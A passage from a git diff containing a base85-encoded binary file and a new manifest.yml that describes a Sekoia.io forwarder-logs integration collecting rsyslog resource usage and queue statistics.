zEGR@wGQDo``8<Y}W0x;(L!`BKD@VF-=J)4-uTd}InI3E~f47tknIj|t<>VmPjdqfB
zjsLhNH`P<L<{l905U)l++Wsxu@GN`ohs8|8GFDHxe~z=l&yGgET`LdZLCn>jgQ%`-
zHPC}eZ9}KEJAT{B{o!%R;Xn}+^KH{@OF`MdHIC5z;_TM9gOa<5Lu}rr*0;@wwL6Wx
z50nl5a#qQ;*1mMzM0OkFalYSDLdy;K!iHoz?+mxQGq@X}=*quA#JOi5UQ8Z<bqu|k
zQQYuj=xE`<a9Vs8gnxNOBAC-8SK;A8B{`J9z6KR=7|iwNMBsGJ{RF`Nl8&A;<!`Y%
zpT@JH)ncr4N#4ccNb2<Z@plK}7%joa)DN%+e~a%mu4lMK0GwkUn8m7MmtRvCaju?m
z9jBo1Y&#bZ{}fG@af*39OQ+&&s4%yp=BeUZc6K6wo<OmT_v~)$BnOU37yheD&<j+6
zr%Z;$Tevv0KdHF_;txV@neGP%i)ZR|jjdvdZ>2BmUwqUkz!g&s<WY|$g35B6Tec<<
z?6Ud)qGhn;e5)e5v{VldB}ej!7po7Wo48T>7aj()LDxq7x9yFME5;fszr1=~V`q?Y
z9Z}HeP#3M}i~H9;G4&tjm0(hH2@00ZqS(>v%N%KVpRRltBDOeWM_eBKJv1J>_N5-+
zssMRqy#5Z3<J%$4HPN`p9~C3~imh8qZWg9BHK#`1kFHkWnV*UE9EwGktk~E7N%kr?
zVN@iHF-hA_bMKs{Z7It$W$aFrT<fvUSOHtAu{}Cu&>vd83X6xxYoWy+LXNawMhxHM
z&d3ay6+aVZD$w`y<m4S&X_{Fa*-T(DF*LgR#p4FY*&`%r=ob&6C`uLiFt?`ZQ+u|U
zE%P{8K3@Zncb=CF-N#>Rbg2E#i-}3Vf8cPmk&R$1JoRy4_wq}5f$~dIuy_L&%zrC@
zw#9-06NUd$tk=x(6zQafTYKnljqHAe%NY`A$DA^fMbF%;eZ?O1$Kb>k8I1*kR(B0P
zE|oOIl~$;Fzvgaq$PjLKHFlJh^z~7jVdHRX-!^;;sRQs_3{H}SYi`Y5-j5f(w5gE>
zJJwFWg0AgO!3kGh3V1R*#Gi9b#*6-VaE0z8y9YqvZhbVX(d0^aqt#?Zn<$;AyAZ6H
zx7y5oa5JT|{eD-=)=E<RSwlpLsLuzd`P#RIMN6CeOoZV?0rh{!4J*h|$RTU6m1n0e
z&dst`{UMV<rEvg;{|#O252D!D#~wb%qnXy6FUeA>(?*B5Sl`1?)IDBrnH&-DV5{Xq
z#pi69?)QQ%#ioK)<?T*y^P+PbVHl0VZI`n3j-q&aq;LmBp6n{$&Of}R|34)dqnH&C
z2p3#>O`##c0xy<yG?qJJN2JdXrXKNVP~42#NH^jorj+7!lemGP8~*ifq_bS!`(*u>
z`?%ShyDneGX@UFm(zA(oBdYJCO2@@jZ|-ZxS#HhDMUMEWWG7{rmXzE6jFPEKmpf^?
zERsD!{@?`}BZDTrq0F!2O)ruxqq=VZ$%_jR=MPmARAKM=xkrVc^+PbK*zlpb#}O1=
z*l)>=y@pjyb83r^mdxC0d5NwNti+7j^EU_Bq?(q*+1$jke|@mFEqSv1N0uToc6-J<
zlOvC)8?3#qWv6~QGtA*ChHThJf4kJ`#pdF+*RJMS2h4s}cCtG$r*%XC<~X*sa+Kw^
zgrPNl|Fc@`RC4N%5!sk6doTG29eE4@$xL&H-Khp#)u60k@+*z0?)g$ylFDQ*4VaM^
zUG^SB>6I>MU40iH*VLN5f?tP=m0xqWvJdtiim_2jNqcPz?G1GFxB1YO_x0?D;wfLl
zME*;;Zh53_`HnT<-))_vw7uw8l(I4t7v}*VHM<iHv5Lx8zfDwVNn-R<#03J&pB-tN
zT|tLGtHLrQg&zxj*-l;je}x*3n(kYjTC#-yahRrIoA7`Cgip?QO^ml)ln|-G9#!0|
zloS7xKuh)j*_E5(Ah_Q~chd4%NaN+|v0#vRDNVZUAB{rMSf5q)tbQlD@>Tpucf#;L
zfB0}t{R+PM(X(39c!s}q_FeT6ToffmmPrN@T6&#4!cXyk-<K^ZYvuKRl1EvQrD(;{
zhk-BcEUf<wPe90ArMnIssUP0^+k2WR-Z1!q%ph!1aW-g3pn*g5NMpJdw|#e)rpBXM
z7tE5#l%t9mW05URzz5;R+-f<j=$IcE&7Z=@W+x><;?Dr2jIFC~T!*_)v9pR7!9gx`
z`67jS_JanlpHzBnHT~SPa2-Q#+;qibqR5HI{Kpju-mtzt)OF(ia`5!!hpqM>Rc}2U
z(QjFqzMil-mVDpJ=Hz8;s60K3dEp{>`scG|rPHTTi#kQ7y$v^vIO19)3;$$JMDIN?
zhJ!24;w{4QLy6-^G-tCRG3>9l=Y><zI-c@MdbcyRW?E9~zl+Krn{{IHUjpd{Q(pLq
zUIb&MZCtlbu@?pe5AJCc+Q^^mEP4Ol?68-0D}jxBk1X@#P!4O&Z1?PUdYI&t`ce5y
zDnH3epsf^@In(xI{<O}WzfV0yC=5%GgY3jk=f1ERB#`MT8;>&U1&Kkrfb%j2NWCmp
zrZ71g9*LiOj-1OiUE%!VLE$M+@f15Zx|G|xWi3Dd9Wq){UQqp#=BZKZr)O1sym7no
z@$bxZ-PrI)LXoCe^<95w8uKcayis=E>r38G;6Fq|Bb0}xJyQe^#*RLJSu0e*W=@4`
z6TB2Un>HW_AKk>b#DQHiW($@?CEXX0o(`<bC*|&Y>!-IQ{?#EL`%~F<Tt4R*c*b2`
zi124=Dxn;GoSg&#Ot@q$sF@L43$W%R`T7m4xilWbrd8Pqv9My|aS3>0<x4%S2nv}0
z0w>1*+zI0i(8%0A_fq_l{?XD*|L^sY&FPOd_X<uQq5s`-n8>IBNyDGcHFXC+5^un|
zPp9cQxtl%Vf~Xi>V5tipHJfzap^1*M24zyoHTtE3Qa3t}*_09+`{#O{YSxaBWVn2_
z%1)&n@{RIPuV;#9v5>V9vh(y#q~+7Y&$((hIc{X{QEWBx7G((_iG^W9wi@NrS6JWR
z?zmynq7`QE^yS&Nh+m<tOJl=adKLASffDHz-c=8m1lg=jXP*%T7^>ZsXrD3Y&?C0H
z{HOOhc+sQW-RdG9>kX*&)(&R#bHp!!zTq)D1N{*cgTWU_cEYstx!IwF4MF(ix|)|)
zS=kjt+BqB<<N}P3ouKQ#A6`uYOh!;Krl$L&9Fyq3i{U-fPX45R1sfEcfzg5A#-3#J
z6invLeY{}YeZ8fvoxg`|S^nKp8sF{#uElsf<4$64*yJ*_He<Lb)s24#ul>!?S*hFj
z0TQ>^3`C9R<%_BD`He1dGg1#DeDAyj$47H^vr?}-BdIDSGR-&u{oGF?QA(pyWUqAK
ze28F$t-h||gKF^JkYL6j*bOah<6xGQ%u7CvKh#+#n2pj6tG&06Y`2zv=$J96*|;t_
z@FrR6K@$v~eO9_rtWvm!1xIYOaA}LDeM<@6pgsOI^|-`(<kn1hxZEDHS5$e)wiii6
z{RVrZ|H*2f?^nTV-7xVLHW`028BigmyDE5m<<a*4W93zCR}rn!py3&<TOL+c>%PkS
z83QYv_U<~e^j}=Kq3`7WuVoX{ac51gm7`$5tZCXl$+~Avn){)^8%_+>lxe#gozB-<
zDpKAO*MFr*BACcT5YeE}SzbdH@z*o@u&!9FbP<55jik;sPTxpB);0A}uPn8`IJYFU
zbU~L8Tv`nO(4D7e#lK-0Zn&lRw%;##<+4=*NAxtz-X-I9Xq|o#6jHet@mnMvQfhxe
z_eutPDroVVl#rx}7*>e4Pi8cLx?U-Lg{ONcc<%_y&{7$Phc{bsn|_%v^^lT(aCr+s
zO&7*VKsL)+m4@Z8^GI=Dc4AId(KQ#5p&ftt{K7&QQ<3Ae6U|?^qR>w<3?7@r<acRm
z;VKZ5Sjm=mJ#yu3KUD_SG+-4It<?Z3G7k>hQ7n5gJmua|(NpV+SHIarTnn6jAvL~u
zVbHNqR3fEGnStfR^cL4ixTpM-E;wyPvAEkAGk-3us7^gP50giY&WQybnbSl}+Q#MO
z&ofj<m39IGpcHfnI4etJ+sn`fg*wIck-&dk2vvic=_g;ve6QA<$ihpoKqxwXGa4%$
z(f-gWfR%$|S#IL3Z4)@lDF!UED7l5t|1#FHKRJ-qywzg1F|TE28jy|l8`l;C+%N3H
zx8f6R*k6*(vy$KSBw3wH@0zZK_plf;XV9sFa0>%0p-XR<O!GL%S~fa9b)_r-KEY7m
z*)xBH_|Yi%%%2$6qn&;b>^}^RY1qpJ+JyU$yF~T(IRC*Iq2fgsG36<e?rbiP$%p?q
z=+}H{dcH+MCHePMFi5{`<EAxz!#d?d8~-<4Ue0mG1G^>sq2iy%j|5^Y0GMs_er1G%
zTkO>MzVJ`?>D5qSy}bqnLN)8p@9<_bj5ND5Bt?jtxYs@EFe4P5dEtj_6|D(9!XQeN
zG775}Dv6Vm#cl=ffob`k1#&j8CkD3i!het<u#CY=aIyY$iGmrbjH+^c=1(q0+Pcbg
z2ZBZoHsr($U!6;B_&-VcaI%}GNsF>nPdsIY$Sj=E<e{~`PwgHO98KVD$oYxPhU(fj
z)UPD8q#DLQV<U$+BiH02KZf2bi%_zuzxgx>7wO3s@L@}F!*ONvOmP0yi<h+RIOy-y
zT_XZocaJHeXvNb4KeVSB{CgQUh0xOk{4%oY$=|HutC5S&zP!tjWzeAKM*L>uLMglB
zqYO}MA}BWGWGXOz6Whq<O8)XA*5M`oZad=M1u`ohyg9DHA0PcVAc$GIQH=)^pEFi<
zyo}#JbF?&#B1k$_wjw+(54n3vrRMd<Qh{iLMGK#Rvb-Hdc@6P`ptd*bGnVnzW6$pq
z)6Gd-{0*BGiAFV{5`Nj6F$B(YdKb-e=K2$ua%L#St_^j4q|f8|Vs&<>n&Gl^Od}R|
zb@_GYSX|S8=}fgq@Y$rvSdzS-fr|!BnY8i>LyTgXG~!(h5L6IPuA+}%nWsd?C(=n?
zNHRHZ&|@BhTPGDMAw!yD>!x1Y=N8{<=<$qun6Qyl(ix=2Elr0RLMS|^Q7t36qM8g^
z`V_d0#PcuI`Ff(!o&GK0lH89@II`mSM&^{mxE--HYvspQZrnZ)UxGTM!h=(pr1@EI
z6_N3Ipe`t;W%QEm)gmc_@0A@ZqqU!xl70;EerJ<!H#%8Q7#T*SBw;3B0<c+q3#b$9
zA+I5=F8;{QiIpF<a1UtRoeYu;-eeRgTEn18$!4EFx_Qfd_Rh;@>1t`buU@enp#w`)
zIKO6W6MK@5bR8PiJ_viK692RzRIDT?37*Tbvz*7EBXia;xV_461ud@gwKZZHS8X2m
zkJU)E743|Qg5&DfJ0{o~gvGUSEvwO2uO#@DVv(#k;5Ys>VF)u_Kn638lwp*Wd`2u`
z`=JZ39fvZOC0@;tTCV4$C4|<xM5*XZuvt1DXO|Dl%fTT!V1<TJ#`=@NII^ILdZD-B
z;eB_Gx7qMQ#@ZG(GxH~=8B|C5F3$dfy_r&g#qEEF*0Nvv*l-E`WwI$D&pi1+79$&9
z%Bi!;jP<{x4o}nwP}*?h6YsJ@YaR2O$qQJnGg13n@7O!)rM+#64j#Iv&-3C|X}b7J
z46lD=wM5u`y#XM;(bATtzwV|0t2fDS)<{fw$Dr^nn_Y#?Q#ay5(IQZ=M@Wo(^-f02
ztOkbX=4D-<yPJ~teC?OYC<>?I0~w5$Ad)cswUU_MIN}cd2Dy8r$xxK*uTo71D;wgc
ziXC^s-|2`q@G-g5$pZc1ZV8P&<RNDVq^<KzOZ}5)IVPTGu2bk1u21!%%*Q1y(s`e*
z`_Z|kP27up)C&gw^z{S^XI~)5;k3jeQQ~3o3g$I&WHMRGqq$5==jylN4VpJACF6Uu
z5mkVOp9;QeypezeAIKe(hGqP0<d<<BGVPepQ)WHpea-V7fb<VNljrRwsz4ba8Qe#9
zc^A}vxeljgv+LzkN}l%eo-d^DH1Q@(>#ad316c$wiY)A~6%V3bJt_J9-xBl&1y$6T
zo40?(yG;}dgdJg}_@iQm-=-UwkdIfuqE$?!hID;A=g^vNtl5@*<#yO=N9OT7Cd7!h
z*5Rxqa|1A4K@NFP^-FwYJ+X&u6Ql8U4uTegLrC0{UXS|IAqv@_JJ3t9bI4!aZEE9w
z@(3Nk{pGsf_>MrsCgzp<Y4dpe>N2^X>zhpaKJwvOrd~{UZ5|kzir$Y@^K#EoS?YAO
zE4uqwli!sfOtn(7F!&`D!y|ffy@<@%b?O?Bc%wh2aDv@$vr}-^qu#N|#qVq49jkI3
z#HZ)^YhSR8f<snx3vZ^bWB<$3Bm8F1vQ`qy2xfU}uW4q}g-N@ca5O!oEB6MNq}uBc
zkN$@|e=3le$<#|a$<RV-hKCwtd;M7p6N+iaCBI2F6vd0;FgNG!nyLnsfQP#r3PP#B
zbY+ZNMUT&UD5z-f1KdS3wTJAoo(O%R!Kaa|U%iEkCg~HXHg5bffrIW?f6U)VfslB*
zE#G$=JWcs$!#=W2kGHJaVQ_&V#=?4nuoK5}M@;(I$FyY$IY(ov!f_PWG&i=cox=KQ
z#v30h$UE#0oY+7Fu-JAcVaoU$S&#BsW(X@&KnxCT`N3%Z(EkHQX-<!N6zG_#($irQ
zQI2!?jrE~s2d148pPhOC-GFBipuW5CIcMgtl7gYAD5piUNo3J5UGKk+VuLuW-e4K~
znHV?Zbem>PMMr}s&R(u6Gl7(-SKjaz9|DBV^t*BKeODhlZx^|-uQh(TWz~2NK1zM#
zkVuVzx#R<(_dBBc<L(UOF+Pa~HGB>#s%i#9LRWS1ju``J-pzN#TDQrm?zArCZr@o&
zK$-3JIsC!re=HAmPYtrd-fiWDHTDuA0jn4A!1@C?f^*8<;|W9qBi*O#<or-piNwjG
z5RT55iFE{|>;1*@>kD>l^Ss+%?|zk(uwR1$QD(;JzK|*fMKp2FZ_Mkx-R~~KSHG}4
z7{-u*&x_O0Vai_vl2u<O;}_pv3gKRRz!ZVzwEp2f=j5HayM3Z{F2iYm3(Xq6hsT!I
zU2DbtlMsB%kIfxLRn|<_X74D|jzkQkMSKU?a`~r-4|)F*<nKc&<RXa3C__=m5&jLO
z>J;|3q~`eb@osu^E8eF!lTH)MknH7h{d_e`I7s62@P?S5tK}^(bOt8hnDSL_!!iPQ
zr-67UE%?k8owi=hcHT$~%f9!ufZ2vt(-29N5krtvAxLNJ1%d4p5N_XPKe_;3N=OS{
z%1e`csi3y}39Qjw*axKChp0QTM&zt17dMQ(hz8{WhX9k`=VIr40!$bQ7S5*wO~f%^
z5)A99BAtV&M}Q_p87ZM){&3BN(f`Ga+OxTYV_G0%KRwzr2?t_`wRR$g0zy|DWg4OX
zos67rwNjLOaqGjUaqL}dt={>MmxUAn@(Hw;;WR@~I64L8EXw)7<gu$?&EKEnO35pr
z6E{K<#r*nc+PM(a`ijJnR#aU%n%q-9X{)FkR3m=r9EpS|y{a(8$`$p?Q`03!MzRp?
zlFE0#;&K0qWweuRor?8PsL$QH0F-?b6XOA_B|Z*EduKy4`Z@>50Uc_#A{3kc3R^ew
z=-j*x22WtP{Va$o`%>#~r{b2PY7T4d>YuCfoyw-_Eo2yc<C6SlQWZdt0=9c?yC*o(
z!Z#5`<iqTiPU<oG+>AdI3BZ(P9ww>=Qrn9U*CmOA!a$>_@0#By`jkMT9EtV1Gg2H}
zNGm>_pwO?nu15M{vGYaC7w;&Wo3?==^+k7y$w3J+6UEYO=i+qGUud6AJ~sQp{`7i`
z{T)1I-MV!^`3S1N4Xx?M$Wu6*V6AWU8fU}b;MJ1k+O>#ezOrS1$tHN`bij1mV$3{^
z0j~YtW8AneE~N&fguzn);^2dh4F>f1Jz%Pf`yYVf@Rfi=D<TO&5l_~G_lQ?G;)Nt^
zx_v7C)tMerfr-u&KKyVG0wvE)bG&0t*N<SeZc=`&RV_Jo0j&Km=I#GUXJaav4Kf4f
zOO$nu0YY7_#uowMuT_UM$r<UMHj2bUc-)hzu)23Z%D)q(Gv|@Q{a=lG(<rdiZBkQb
z^hqR^{$2H++>t3kv3AFw`?ac=E2+Gk9M@i1(1+pn;FRpT!VZpiTFSZpddc4S3|Pqb
z?6h<jJO%2?Iti{SD!Ew-{79VaP0Wpxl7%cILLzQK3RqYgPal4`dpRk=gUtU5ka_P^
zZte|a&b~)5!o*-I@@yLctPRn5|5xb`91`RLN_ybM8z1V-%mqf+Nirf?>x+i0Wy9{J
zIoTRB_q_psIuVKNY1D7d+6`wUBiy7ro@_|S;r6P{Cy-V9r*u?1T;qP$U4{>&ePKjy
znNZ<;g4usR&R$K#1!^yjop}%rJa~tKg-1AMNYve9-@S@FgCv3XTce+B%4N1FECY)>
z;c-`8`EkG3O;b6lCNTuqCUaA=XPhv1)bM3Ot@uPJ_3XOU$|^W%?|7!PP`7pD*>LD?
zW}33QCYUbmtRoUjpr?LPwxjM0bZ>>UHp~x?Y}4^RYH{+F*m8CD8tUT4TD^;`s7ex7
z&`nR}^kj?p)U&#qVCJsWo`Az~x_MUpTI{6VPU>Zxag&#cuYFV;p!v~$bYFQ2dkuIc
z8`iMqS9^<#uh=H^zsCWQh;)b>RP3fZ^L_-Mm05UP#SDW!d9(wrl}vu)F6nWrb&;Et
zhG$wK?P39yal_8wxl?$uLp#HTaM7{LjQl{MEgaH)xlHMa_sNg1!Bk^*lNnch#ce4m
ze#3%iMfNi&rm?6dmAZ{C)v>udqL;c$FE|=&el5?x8M77BP51xGl<<Du6(mx>q_1QZ
zD07@a9<15Xvy$sE05sX|`k)|{#;sR2>i~1dpR=QED21n7X}-%ER7kEo4xpgQxU`AZ
zY7|F6A7=VV&34Ql{ZC)D4u7AVFGuRyHQElWCj4?pQqv}Xlw~92>Y4PFGvbkl&PP>x
zjz6?MAi(y{WP;?L{jvVjN*5?qE^^-|l*qSD^}3al18&g`*|r1GcWsgaB&MbxD42UA
z`89Mwf5HPfvg_PZ#dJzJrV%h!XxsKRz3M<fAI1-#9|r%N^i?^)hEB(fEY^+Zkr#wm
zN}0?(@=hv6<Kwm;i|Tu%tm^74!fM+D8u7WjOy6(Yb=Z$AU{;zfdkva7ScqN-JyTIl
zf0gqCaE+ELJzeIj88a>!N6%JBz24EQU#mUt{NKQv=;4V;Um>yD+$8kS8xP9sYXU@d
zc7C!wsah1o{pECd9+5%~8vNz|-PxJ+wI(;I(JOU>Sz(+0bzsvl4K<shcds91!Y`oa
z{uYfCG{=eb1k3qYh(hdWp>hjDRQ_9Xa!WaG=C_M1f7a>7@r>u4_DIT7%Z9UVz0&$R
z|HM$doLBV~s{@lc0@iej=IXE46IW1T90+rjEm~{C05kml7hv=qe+K9-q(}+7YjQUP
zPxr+0e+V>)6$9oBigi<_!=f)Ltvn=ZlCG`%j2<cAnF7K1=jz(wzbyI9VTqyAxX3i=
zgk@2A6jdi7={uPuk>vQaW#LnM!?Q*{!#q&t8;Krq`aGnzo$5h#jXr<10;q;7z}Ju`
zf2TdRqSk{BnjbV;&g&7C{{l*=kF({U?sIafnp`^3IbKiDUxCZr3;F(J;zHKcFM=Yr
zcS?on{eWAU?_t<z1zSzaQEzBc8G0xVy>l1HFcO)CSCQmqziK_~DKx~rsNg+^l3o86
zDDTKbP60hgyeMnXMZXRB{Pzxf{cK3dD5&`Kya>5hB@X-ul08mr+#P1+pTZX_pPx+K
zc)C-;Hj+plv-2@#t6V-1ufWJm<U%O=g(OJfrJB{w?<m;F{l=d>h@e<x(GRmWHvY%D
zW!pOwhVY3@yZG?UkMPxy@Wn0pz)fWeZ^4k|1E7R2l#e}E|F+E9H0?y|5jJ`yPdWLl
z&^QH@U{!I-?@CjN*7S@URtrP{{}Nv4v+^REhn~p_<uW*@Fqr`VI)BWI7Ll(BCRn+_
zroSxD)HYi`jYSMZTU91^@c$^sa5s(C0rhpea<NjbZzlE+Rr_Zix#r9#`MnfLWk75x
z9@5b3mF~)$e&@W4@ANYWI@J7(SAR1yQDP=GeDx0bw2(-eD>L}EL|GYV8fB&qcGhw0
z5EBXxxd4$?_AOhVC7oiS8!!#sywCKC&3}Ah#OvNxBzx8pD1i^4WcA<Yo<aJ9K@hqG
z-ZQ2S!1A<@Jq;*O^@CdNvX{ng)=Okh%`~Ws27p~IBGXuvyVZbYEOC!7#*F9>2SGtE
z*$W0VNPM)JPDUdxN0rm6|37b6g<Ay0e-(1;sn?i%;P|`e2Fw#4rYi7;@x1D-qGgBT
z2LRw_#U3oNfUKHouI6%@a6b9&a>m7*mNbW9O*9D#Hg)BVaH6(WOV<^Qm((b%{^?&?
zzefVxBlQJRqu+6_LI1v<oxFqO{JFp!QTWp-{22r}3#Ls~D~>;0#>j(9_VTCo%R9<Q
zK{bIAAo$QE+`Re(G;q{xPV=4n6z=iJ-FwNqJb-k`(2%QI2)v6AymeyNbm&?r>W0)<
z4ybg2IWh7Pw$!fh%waeE;>X2l2UYjHU+zrTYHzU?RJ|W<FCTYKKJ8X+`SXh|W1Kxw
zWgRLIH75Cjo3B{O8<ScXtSTS%?>+%^N<s#)ge#e|U$B4kxeU5w**>~hV`y@uYhJ@p
zJncC`2#!2_9<1+o*m~Nch*(?nEeD(_goys48gClaJH*A>@t6Il=M{d{Z#41bn)b@m
zi;)l8SyzXktT4cww}FKr)BzM>G-j@}*nZv;fsfXIaE8G{lg$RJZqs;tuAZihb<Cz(
z`LiL1zI%-bra_k#qk5$@Vx_}*WIzqplL(blTzCeJQN!6i*g1CJs~IU*h68oUB#`I1
zC31$a>@$R;ihRIhAfx+!JOws%t~#JRVP0o!dxTRYf>1?vpT;>SP!G?qhboJ`10074
zerVchI(8xJmAitlAzpeZ4Y3MyW)((}lhwUL>jK|Tsz=J1q_ZPSx3b`5R4Lgk_3VV2
zvH`<PrGvZ-`T)h&On|!t1RlyhoZDY)85<6e_>_}Z?BTWW5d`tby;!g)ts*3Xb^5YD
z`Sc(6iG*|90~&(kIvtlrr0LjfduhcXL$~sJixGE-><HCIE7X6LWa;qk(w$$6{=zd|
z5oSy&U8>SBD8J^M2!~lPCH!Z@ADNJFT+(+5^&WDiQTPu)I#rS~m2CAU(w=0IktAKH
z?*cBB^%vVM^-=glu(98*Uv1V~7zV;%34;KRhjeEGYQqJP-Rty?Sv&L<;LLGsfZ!bW
zFTIYXK1^PxocRUvXo~7GTUYY(;{0Lf>(vo}GMfko_jeqG>|-8!CMkJjEs(m{k-u<p
zk#o!j6C}2#NFW!m$)$JG!}-5#0^=}F2gd^Eb(bpP%1HgS2VQs{P|PXn*GCmyyXv3#
zcf|<B<t5X>hd}e3lTsuvGUV!Bij;Y1b9@>&&hef`u|#f*fa?MXblFzVr{U#({w&KY
zGN&YMFZY`hvwkpsbP}1)Syl4fPR%Gg)rgET%kucFL5y5PM)@GLG`Enr6bJXMMt<10
z_xLWpLfVv9`udI9Bw!wT5BW>f&9tFd{(<uDZN`QpWS8jiYa;CrxHBcBkX9__Kd+^9
zJqnJfQ8R+z+WU#l1yrG2OWUwfI@(q|;T!+EP!Ow%^;QkxAyWtoiv=$P#;Jw7+)oNj
z*62BuJ42aSp_oXSEdXY)(zp7+o<7u}g?qdvibZCIh2_gtl)t=dVHqAUd*xf=1#~w0
zkKLtE5BA@hw=WB&KaHOkbTOVcT@840+81)G)`$OK7BdNVLsN-jx$ueJ1!3`mlSCNc
zSG9M$2iW}dHW+(3e198)XaZ44WY^M-F=ab!{y?+C{2Q6uieAklcQ^M$CxagAng-CX
zj?KP#o-=d?Ob~xDuq;t<ooMhKr!S!5g&)YT2qYO7sTV6Qln<o(l`3xK<gaXbQGk#r
zkyAW<shyQ8fT{RE4uibnfBIMqD5;9w52F*lQ9M3}&2<%9lK~ExTFN1A{T0@cK0+es
zDvP$svhC71?{FEXgQI8oCad~t4jLr^*gPwF#;S0QNVs-Q*%t(d+d!5FYI~dz(~V+{
zE76=}dm_22@KMP#AG$Gb0N!mG{jX^qAbZt`E06M)D7@!m?7Ur5^t%QIzkxIR1b4s7
z{aqv0c$r2Q4Oy691W;-gQwdxJAK+f(nlRyOwEh!usB*0$<n9#%fZc7VatzR!8(v-f
zkAB|Big}ANZV-CpWmv!RoV5j?NGm1t)bK9I5ai=;miK`1BD;CO>oL_R-IbjXl*kxb
z1T54^&xSib)&VE|2Q_2m3UCb1@HxW3R-*~pH%p(bTf{_L<Ab@E?7<QQ=v>s_!VYrO
z*@15=o~d}(K|-;gO2&3tvUuy&)!Zll(vjLm_O3nfSId^K$x#uzBB>z1@PDtzBXaK=
z<yR20P`~o2F>dx<`9wRUuN?ep#=80{CID}6Vn%K^a}|aX!GNSXA};3h7ZW`?(r9zC
z_@5}90CRja^lddjY5N$!y<@>=G_TBBKY0QzNe6weLNKmQdB|7LUfW0}Vx%ogz(_rO
zts*OgP%DGnYJqKMGPZzvKUsi+RmU}|E_yW=QlG0T3I^cY1G8mKG7|K-9*BJ;FIAVA
z$tS*i_!l4)bsu@(qV48H1*^erQ$kT~^f*~*i&IFe!F~xIq<k>Cj=JXvOsh)2rDNX2
z4>gqmYnekkxPIs{ru}OhiUF=zG%kP)Aa_15+467EC>+SR;2%hDII%5W#N5bQf1kMy
zspj>ilKp7n^`Z(Thh;ow$3?HGc9((ZGq<v3ODVOB?5#^+mqFjSMx<2-W5{3Ii$~qV
z|26zL^AyC366Gymg+Y5Il!H;mK{$`-IOfY~jRwJ-Q>ti2Hk#hm{=5x6qJ|?Fl&)!I
z+*`WdRB5sJr(mUHmiVN&Jd{wY9K!j|!0{~Q-Qbjes{1@FrU2_Bp8NJU&U;}5T07h-
z+qc4UuF9(!o|(Ys;PRFW@VZ`FR>VU*tE}U&>!t1ROeQ{W7wXfPd6`EnaKsR{{}X9&
z2(A9%Jk)5a>9&d?Pk+P)hm@?|DkzRyy1b>{v23>%Ms(71m|uCTb}lGCb<Q70{NAC#
zvwGypmTR1%=<A)<G%pqB#+1HzZ1lbM_YxB>neKMZ1FZKiYP_YC3rR;^F`q)j3`#)U
zjxAzID5+_FS6>R4tuEvlrWUehfI?Fr4F&HoEdz6@VJq}86S%8QvyaGPoo~lHt*lQt
zE(z6lme*hsL}5%npC&>Vu3r28<CfR)mTqLjT%Fat=3U6A2y=QfeUB#`O^boId!+-a
zy-MirlqZuY7JYRaF7FV*HcsaMGqX)P_H{be0h@eZ(7np#Y=p!>g#j5=@>SPKN~Fp*
zmC_<(mgbdm*w|YZjU$=|{5PqpLQ-@eDcahbt`?hO=&4<wCR#yocbl_z^Z=<wbkz~y
z;x9$A`CnCH+povR|K7+Tfzq>pMei;p^4^s$$Vdx_lWo6PTm{SdS$J}iS0-<Z?$4gf
zJ4M#N`74O`iY+u*E|H@^D5dwEB)>Tsp4CIbok@0G0IBaESC+=4El(2u7_`nX-JEWY
zVXJXpvr!GhJ78F0>9s)rf|4r76bMQFDjcAeyitY<rG0naUtDT1X@|Uya42gtEZ#YZ
z4wGT7ks;{59+g!2=wNqh*`J9QBDgHcNTRl@wHP+a&tP9z%PvEt-g$cf8#U<v6J}ao
z2VDOVZ<8w1aPv<~a%Dch!l#E1_zE)%f+%>ouK6>YD2h41RYjgii_VTErVe}h9j&Hc
z2%0O{1?`Qp{X_S0$f)VV*SJUh=0O_>0Ym@^7iGv_R4gM!BY|^|ZIOcPe}2vUWrSY)
zsGik|10v(QQ>)Ncxv?xkH{<raMXcTBw7hK|j3bTLoPwbH)Al@jY#{Ewdu*2seGO|r
z3P;5Q#8%*vxYDNul&v|z1YUW@*W1Xg@Ft>Qj^vo=9~Ok=I2)?r;=#x+o3D72!dpK%
zjAcDp0)!DVzcmE1lBodcqAQJ0y*XF)o)WJ;8yFnB=<e)N-y6!JX5&bz@-As(BM8R<
zO%LCA(%g(9SABq^Ef~j=D5)x3P{OFhtvh{>oR5hf-sxf#Y4=$J6o3T{CR-tqg8#J&
zz|L2J_12l1?Pm{VQsE2GJ=AqVlt8({Z1EI*?UjO}H5_4%Kk%O-ZoKM47Sk;JAU|9Z
zPC<posYP~!7nk7v1U)?HS&UXVJu~QYx=lnt9QssjagYx5bp+q^Ba3+@1uQMGi?CO0
zzzx2SU%g0s<Eo8nr|DDoo;U?(oB>(1;xjb$uO%xC)k$oxNhR@<y(n_cXgbhsrCd|5
z;*fg`<q@wi{b_-2XZGwSQcdb*tYKJ5uGq%`O^RC0V?8;tm>UjV_IH)2Z{ANvISnaJ
zIKt@RV&Z8D%+Z**I;>B3TF;9`V9q+Zdos`n{woi9$AqieJ6e2uT;D{Lw1WOJk;mV|
zG8OhL(SyI}Z>f9+P9$M5J4&Dueh)aus)iK3F|{P0$ICs2YhaX=dy<#V(y(qkGGws2
zuU9=k;h(zi+Mp~a^Lt?lX4KZiD9s^t5ro|z;2Io&-Hp9T+d@G`Ew5TZmJ%^CYkn;F
zyZ^TFT>_%w8M|6OXS)*hATh5S0m%LMf|n{o7kpD|qQd_*+qq_Ql|I7ro~3>ejQlRT
z56F(olwOS)XuwIzu^RzxeyyCk*Szs+#c+O3etDaisk`$qC{1$nc8<Bin6+UHJ{e5Z
z5i}RIDHOh{&y-rjwTJR)g-lghLUDs1YLR^%T@<A@>Vz_%ZgyNgDSc{~^mv`um{5!6
z0SkgA%LDOmxeD?29?>d;E&<6t!~)TWKQh1hmqPpR9ZnuypeEKg90#tE8;vRyLhz4c
zI8T|Ssq_#9d;T5TM34VH);)zXC<)MHuR-4yx&@(fbcyp)c=vV;LaiP&YC;cHG?Yse
HpT7EkUAMF@

literal 0
HcmV?d00001

diff --git a/SekoiaIO/forwarder_log/_meta/manifest.yml b/SekoiaIO/forwarder_log/_meta/manifest.yml
new file mode 100644
index 000000000..cac923b14
--- /dev/null
+++ b/SekoiaIO/forwarder_log/_meta/manifest.yml
@@ -0,0 +1,9 @@
+uuid: 915a119c-2ec8-4482-a3c6-4d4cae62b671
+name: Sekoia.io forwarder logs
+slug: sekoiaio-forwarder-logs
+
+description: >-
+  Sekoia.io forwarder logs collect all statictics coming from Sekoia forwarder instances
+
+data_sources:
+  Process monitoring: "Sekoia forwarder logs are collected: rsyslog resource usage, queue size, number of messages handled, .."
\ No newline at end of file
